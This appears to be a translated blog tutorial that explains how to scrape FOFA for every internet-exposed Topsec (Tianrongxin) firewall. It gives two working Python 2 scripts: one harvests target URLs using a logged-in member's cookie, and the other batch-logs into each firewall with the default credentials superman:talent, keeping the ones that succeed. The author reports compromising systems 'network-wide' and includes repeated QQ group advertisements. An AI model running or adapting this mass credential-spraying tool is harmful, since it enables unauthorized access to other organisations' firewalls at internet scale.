Foreword: In a test, I encountered Tianrongxin's firewall. The weak password test failed. In addition, Tianrongxin's firewall will generally lock the login after five errors, so weak passwords cannot be blasted. In reality, this system is still There are many, this article introduces how to use fofa to crawl the same system server on the entire network, and then batch check the script writing of the default user name and password. This article takes the weak firewall password of TOPSEC as an example.
Our idea is to search the unique features of the target system server through fofa, such as some unique pages of the system, and then the script crawls the links we need to collect, and then uses the script to batch check the default username and password.
(After having this idea, Baidu took a look. Some masters have already written fofa crawling link scripts, so we won’t build wheels. Let’s change them. Streamlined, and the code is relatively simple. The master has already written very well. Yes, the original link: https://www.cnblogs.com/Cl0ud/p/12384457.html)
Preliminary preparation
One: Log in to the member's fofa account. If you are not a fofa member, you can only view five pages of content. If you want to crawl all the links that match the characteristics, you need a member, and an ordinary member is fine. This needs to be solved by yourself! After logging in, we obtain the cookie value of the currently logged-in account for later use when crawling links.
Two: Find the characteristic url of the target firewall: "/cgi/maincgi.cgi", search some fofa to find the same target system, at this time the link can delete the q parameter, as long as the qbase64 parameter is the same, https://fofa .so/result?qbase64=Ii9jZ2kvbWFpbmNnaS5jZ2ki, what we need is the qbase64 parameter: Ii9jZ2kvbWFpbmNnaS5jZ2ki
Three: At this time, all the links are the backend login page of the firewall, you can see a login box, enter the account password to log in, we enter the default account: password→superman:talent, and then click to log in and capture the packet
The preliminary work has been prepared, and then you need to write scripts to crawl the links that need to be tested and verify them in batches. In order to facilitate later changes, the crawling and detection of weak passwords are divided into two scripts.
Many people learn python and don't know where to start.
Many people learn python and after mastering the basic grammar, they don't know where to find cases to get started.
Many people who have done case studies do not know how to learn more advanced knowledge.
So for these three types of people, I will provide you with a good learning platform, free to receive video tutorials, e-books, and the source code of the course!
QQ group: 705933274
Script part (divided into link crawling and batch detection)
The environment required for the script is python2
fofa link crawling script
The coding problem is really annoying, all kinds of errors are reported, the script output is in English, and we directly edit the cookies that need to be used, and the qbase parameters directly into the code, and you can modify the code by yourself when you use it~
import requests
from lxml import etree
import re
import time
cookie = "1"
qbase64 = "Ii9jZ2kvbWFpbmNnaS5jZ2ki"
def spider():
header = {
"Connection": "keep-alive",
"Cookie": "_fofapro_ars_session=" + cookie,
}
print("spider website is :https://fofa.so/result?qbase64=" + qbase64)
html = requests.get(url="https://fofa.so/result?qbase64=" + qbase64, headers=header).text
pagenum = re.findall('>(\d*)</a> <a class="next_page" rel="next"', html)
print("have page: " + pagenum[0])
stop_page = raw_input("please input stop page: \n")
doc = open("url.txt", "a+")
for i in range(1, int(pagenum[0])):
print("Now write " + str(i) + " page")
pageurl = requests.get('https://fofa.so/result?page=' + str(i) + '&qbase64=' + qbase64, headers=header)
tree = etree.HTML(pageurl.text)
urllist = tree.xpath('/html/body/div[@id="result"]/div[@class="main-result clearfix padTop90"]/div[@class="result-right-list"]/div[@class="result-right-list-view"]/div[@class="right-list-view-item clearfix"]/div[@class="fl box-sizing"]/div[@class="re-domain"]/a[@target="_blank"]/@href')
for j in urllist:
doc.write(j + "\n")
if i == int(stop_page):
break
time.sleep(10)
doc.close()
print("OK,Spider is End .")
def main():
spider()
if __name__ == '__main__':
main()In the preliminary preparation, we have obtained the cookie of the fofa login user, and the qbase64 parameter we searched for, modify the value of cookie and qbase64 in the above code, and then the python script name.py, enter the page number to be stopped, and wait for the end of the run. After the end, the url.txt file in the same directory is the collected target system url. The running screenshot is as follows.
Batch detection script
import requests
import time
payload = {
"username":"superman",
"passwd":"talent",
"loginSubmitIpt":''
}
'''proxy='127.0.0.1:1080'
proxies={
'http':'http://' + proxy,
'https':'https://' + proxy
}'''
header={'Connection': 'close'}
f = open("url.txt", "r")
r = open("url_x.txt","w")
lines = f.readlines()
i=0
x=0
for line in lines:
try:
response = requests.post(line+"/cgi/maincgi.cgi?Url=Index",data = payload,headers = header,timeout=5,verify=False)
except:
continue
else:
i=i+1
print(str(i))
if "maincgi.cgi?Url=Main" in (response.text.replace(u'\xa9', u'')):
r.write(line + "\n")
x=x+1
print(str(i)+"is being detected")
print("A vulnerability link has been detected" + str(x))
f.close()
r.close()If you don’t use try, there is an error, as shown in the figure below, Baidu took a look, and the methods on the Internet have not been resolved. After testing, some links will report exceptions, and some links are okay, so we use try to ignore these abnormal requests. , If there is a master who has a solution, welcome to make suggestions~
After the script runs, it will read the links of url.txt to detect the default password one by one, and output the first one being detected. After the weak password system is detected, the number that has been detected will be output.
The detected weak password system link will also be output, and the system link with weak password will be saved in url_x.txt, as shown below:
After running the script for a while, the result came out. Then, the default password system of the basic network-wide Tianrongxin is also here, as shown in the following figure:
The idea is like this, batch crawling, batch testing, and more ways to use it, I won’t talk about it. You can modify the code according to your needs. There are still many shortcomings. I look forward to your opinions and suggestions from the masters~
I still want to recommend the Python learning Q group I built by myself : 705933274. The group is all learning Python. If you want to learn or are learning Python, you are welcome to join. Everyone is a software development party and share dry goods from time to time ( Only related to Python software development), including a copy of the latest Python advanced materials and zero-based teaching compiled by myself in 2021. Welcome to the advanced and friends interested in Python to join!